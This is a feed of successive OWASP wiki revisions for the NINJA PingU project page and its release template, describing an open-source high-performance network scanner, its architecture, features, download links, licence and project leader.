&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc?autoplay=1&amp;amp;autohide=1&amp;amp;&amp;amp;rel=0&amp;amp;start=119&amp;amp;hd=1&amp;amp;vq=hd720}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base at https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
'''[http://owasp.github.io/NINJA-PingU/ Home Page]'''&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
GPLv3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171579</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171579"/>
				<updated>2014-04-04T11:11:50Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Check it out at its  '''[http://owasp.github.io/NINJA-PingU/ home page]'''.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:OWASP_NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base at https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
'''[http://owasp.github.io/NINJA-PingU/ Home Page]'''&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Releases/Current&amp;diff=171356</id>
		<title>Projects/OWASP NINJA PingU Project/Releases/Current</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Releases/Current&amp;diff=171356"/>
				<updated>2014-04-01T11:41:11Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template: &amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Release About&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
| project_name = OWASP NINJA PingU&lt;br /&gt;
| project_home_page = http://owasp.github.io/NINJA-PingU/#&lt;br /&gt;
| release_name = OWASP NINJA PingU v1.0&lt;br /&gt;
| release_date = 01/15/2014&lt;br /&gt;
&lt;br /&gt;
| release_description = NINJA-PingU Is Not Just a Ping Utility is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration. The v1.0 release includes the complete and functional NINJA PingU's framework with a set of plugins for services analysis and embedded devices identification. More information about those and its performance can be found [http://goo.gl/eMxfkq here].&lt;br /&gt;
&lt;br /&gt;
| release_license = GPLV3&lt;br /&gt;
| release_download_link = https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz&lt;br /&gt;
&lt;br /&gt;
| leader_name1 = Guifre&lt;br /&gt;
| leader_email1 = guifre.ruiz@owasp.org&lt;br /&gt;
| leader_username1 = Guifre_Ruiz&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
| release_notes = &lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Releases/Current&amp;diff=171355</id>
		<title>Projects/OWASP NINJA PingU Project/Releases/Current</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Projects/OWASP_NINJA_PingU_Project/Releases/Current&amp;diff=171355"/>
				<updated>2014-04-01T11:39:57Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template: &amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Release About&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
| project_name = OWASP NINJA PingU&lt;br /&gt;
| project_home_page = http://owasp.github.io/NINJA-PingU/&lt;br /&gt;
| release_name = OWASP NINJA PingU v1.0&lt;br /&gt;
| release_date = 01/15/2014&lt;br /&gt;
&lt;br /&gt;
| release_description = NINJA-PingU Is Not Just a Ping Utility is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration. The v1.0 release includes the complete and functional NINJA PingU's framework with a set of plugins for services analysis and embedded devices identification. More information about those and its performance can be found [http://goo.gl/eMxfkq here].&lt;br /&gt;
&lt;br /&gt;
| release_license = GPLV3&lt;br /&gt;
| release_download_link = https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz&lt;br /&gt;
&lt;br /&gt;
| leader_name1 = Guifre Ruiz&lt;br /&gt;
| leader_email1 = guifre.ruiz@owasp.org&lt;br /&gt;
| leader_username1 = guifre&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
| release_notes = &lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171354</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=171354"/>
				<updated>2014-04-01T11:35:13Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Check out its [http://owasp.github.io/NINJA-PingU/ home page].&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:OWASP_NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div align=&amp;quot;center&amp;quot;&amp;gt;{{#ev:youtube|_vQwPWJp8Jc}}&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base at https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:25%;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_DownaloadV1.jpg||150px|left||link=https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz]]&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
mirror [https://www.owasp.org/images/4/4f/NINJA-PinguV1.0.tar.gz download]&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [https://github.com/OWASP/NINJA-PingU/archive/v1.0.tar.gz PingU V1.0]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width25%;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Detection.&lt;br /&gt;
* Services Identification&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Identification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_NINJA_PingU_Design.jpg&amp;diff=167014</id>
		<title>File:OWASP NINJA PingU Design.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_NINJA_PingU_Design.jpg&amp;diff=167014"/>
				<updated>2014-01-30T21:15:33Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=167013</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=167013"/>
				<updated>2014-01-30T21:15:17Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:OWASP_NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
